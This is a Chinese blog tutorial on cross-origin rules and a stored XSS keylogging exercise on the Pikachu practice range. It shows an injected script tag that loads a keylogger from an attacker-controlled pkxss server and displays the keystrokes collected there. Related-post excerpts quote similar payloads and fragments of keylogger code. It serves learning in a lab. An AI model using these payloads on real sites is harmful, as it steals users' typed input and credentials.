7.XSS获取键盘记录(存储型xss)

于 2024-06-24 09:00:00 发布
阅读量390 收藏 6
点赞数 9
分类专栏: 网络安全web测试之xss与暴漏破解 文章标签: xss 前端 跨域
曲云龙
本文链接:https://blog.csdn.net/weixin_46253249/article/details/139701463
版权

什么是跨域

http:// www . xyz.com : 8080 / script/test.js
协议 子域名 主域名 端口 资源地址
当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域
我们把不同的域之间请求数据的操作,成为跨域操作。
跨域-同源策略
而为了安全考虑,所有的浏览器都约定了“同源策略”,同源策略规定,两个不同域名之间不能使用JS进行相互操作。比如:x.com域名下的javascrip并不能操作y.com域下的对象。
如果想要跨域操作,则需要管理员进行特殊的配置。 比如通过:header(“Access-Control-Allow-Origin:x.com”)指定。
Tips: 下面这些标签跨域加载资源(资源类型是有限制的)是不受同源策略限制的。

<script src=“…”> //js,加载到本地执行
<img src=“…”> //图片
<link href=“…”> //css
<iframe src=“…”> //任意资源

为什么要有同源策略:

A登陆了淘宝,攻击者向A发送一个恶意链接urlb:http://www.盗你cookie.com 。如果没有同源策略,即:urlb上的js可以操作A的内容(如:获取cookie等) ,有了同源策略,就限制了这种情况。 再比如: 一个恶意站点A上使用了,发送该恶意url到攻击对象,攻击对象登陆后如果没有同源策略,则A上的JS即可获取B站点的登陆信息。
网络钓鱼就是我们现在攻击方嵌入js代码,代码指向我们组织好的的攻击代码,当用户浏览攻击页面的时候,js代码执行,攻击代码执行,攻击代码中有一个函数(javascript中有一个方法叫做event.keycode方法他能够记录键盘的输入),当他收取到输入之后,再发给我们的后台。在代码中通过ajax,用post请求发送键盘输入的入侵者的IP地址信息如图:下面的IP地址是入侵者的
在这里插入图片描述

允许被所有人进行访问
在这里插入图片描述

输入设置好的恶意JS代码:

<script src="http://192.168.30.168/pikachu/pkxss/rkeypress/rk.js"></script>
然后在键盘上随意输入,就可以到xss平台上去查看键盘输入的结果

将恶意JS代码输入到搜索框中,进行提交
在这里插入图片描述

在页面随意输入字母:hgqqq
在这里插入图片描述

后台pkxss平台获取键盘记录
在这里插入图片描述

愿听风成曲
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS跨站脚本攻击:获取键盘记录
jklbnm12的博客
01-20 692
将进行下图3个实验,更好的来理解xss的危害和原理 先去修改下Pikachu靶机中的,cookie.php修改成自己的ip 实验1:xss如何获取cookie? 只需要将  Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可。 登入下      默认没任何数据 1.1 GETXSS利用:cookie获取 先将字符长度的限制给修改掉 pkxss后台: http://192.168.43.117/pkxss/pkxss_login.php 现在是没
XSS获取键盘记录练习
weixin_44720762的博客
05-03 1113
在开始本篇博客之前,我想先声明,本人初涉安全领域知识,此博客用于记录日常渗透练习心得,并不提倡用着专业指导知识,请选择性阅读。 因为相关知识的练习性,先对部分名词含义进行说明。 跨域: URL(统一资源定位符)中有 协议,子域名,主域名,端口,资源地址。在任意两个URL中这几个部分中任意部分纯在不同就是跨域操作。我们把任意两个域间进行的资源访问操作称为跨域操作。 同源策略:同源策略(Same or...
pikachu之xss获取键盘记录
最新发布
2301_80661529的博客
02-28 679
此处xss漏洞主要利用src属性的跨站访问,使得被攻击者可以通过src属性自动跳转到攻击者的xss平台,祝各位学习顺利!
XSS键盘记录和cookie获取
Williamanddog的博客
01-26 1705
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
3-8案例演示-xss获取键盘记录实验演示
山兔的博客
04-26 1021
在实验前,先了解一下什么是跨域 因为在这个实验里面,我们会去远程的调用js文件,远程调用js会涉及到跨域请求的问题 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名、子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,(同源策略是在浏览器端去执行的)同源策略规定,两个不同
web渗透测试-从入门到放弃-04XSS-键盘记录
lx1315998513的博客
12-15 356
案例-xss键盘记录 1.在实验前,先了解一下什么是跨域 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作。 下面的地址同源吗?...
YXcms-含有存储XSS漏洞的源码包
03-17
"YXcms-含有存储XSS漏洞的源码包" 这个标题揭示了我们要讨论的核心内容。YXcms是一个内容管理系统(CMS),它不幸地包含了存储跨站脚本(Stored XSS)的安全漏洞。存储XSSXSS攻击的一种类,这种漏洞通常...
存储Xss成因及挖掘方法
02-21
存储Xss成因及挖掘方法
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储跨站脚本(Stored Cross-Site Scripting,简称存储XSS)漏洞。这种漏洞允许...
DedeCMS 存储xss漏洞1
08-03
这个存储 XSS 漏洞允许攻击者通过注入恶意脚本到 `des` 参数,从而在用户的浏览器上执行,获取用户的敏感信息,如 Cookie。该漏洞在DedeCMS V5.7 UTF8 SP2 版本中被发现,发布日期为2017年3月15日。当DedeCMS的...
存储XSS灰盒测试-01
09-15
存储XSS灰盒测试-01 存储XSS是一种常见的Web应用安全漏洞,它允许攻击者将恶意脚本存储在服务器上,然后在其他用户访问时触发恶意脚本,从而实现攻击。存储XSS的危害性非常高,因此需要进行严格的检测和防护...
xss-键盘记录
weixin_46164380的博客
03-08 172
开启liunx的apache服务。 /etc/init.d/apache2 start 在/var/www/html下面创建三个文件 keylogger.js document.onkeypress = function(evt) { evt = evt || window.event key = String.fromCharCode(evt.charCode) if...
XSS漏洞利用——键盘记录
cxrpty的博客
02-21 1366
实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。 php代码如下: <?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key']...
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1612
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
XSS漏洞利用---键盘记录
Ethan024的博客
03-13 459
XSS漏洞利用(本文仅供技术学习与分享) 存储XSS漏洞之钓鱼 实验准备: 皮卡丘靶场; 存在存储xss漏洞的网页; pkxss键盘记录后台; 实验步骤: 4. 嵌入恶意的js标签 — src=“http://localhost/pikaqiu.cn/pkxss/rkeypress/rk.js” 5. 在输入框中输入字符串:111111并查看后台,发现已经记录。 Tips: 如果无法记录数据,需关闭浏览器的同源策略Access-Contrl-Allow-Origin. ...
xss获取键盘记录实验演示
qq_42764906的博客
04-23 259
在实验开始之前我们需要了解几个概念 在此之前把如图的位置改为自己pkxss的网址 检查如图的代码是否有 或者有没有没注释掉 在存储xss输入 之后在键盘上敲aaaaaa 得到 如图 ...
XSS跨站脚本攻击之——XSS获取键盘记录
温柔小薛的博客
04-05 465
XSS获取键盘记录 条件比较苛刻 除非对方网站管理员配置了跨域访问否则无法实现 理论 什么是跨域 http:// www. oldboyedu.com :80 / news/index.php 协议 :// 子域名 . 主域名 : 端口 / 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请...
xss盗取键盘记录实例
whoim_i的博客
11-06 1104
本实验以反射xss漏洞为例 实验环境:kali 192.168.133.131 dvwa靶机 192.168.133.128 1、首先看起kali上的apache服务,命令: /etc/init.d/apache2 start 2、在kali的浏览器输入:http://192.168.133.131 或 http://localhost 地址进行访问测试,检查apache是否开启成功 3、 ...
存储XSS攻击:成因、挖掘与防御策略
存储XSS(跨站脚本攻击)是Web安全领域的一种常见漏洞类,它发生在用户的敏感数据在服务器端被恶意编码并持久地存储于数据库中,然后在后续的用户访问时被读取并执行。这种攻击形式的特点在于,攻击代码不是临时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愿听风成曲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值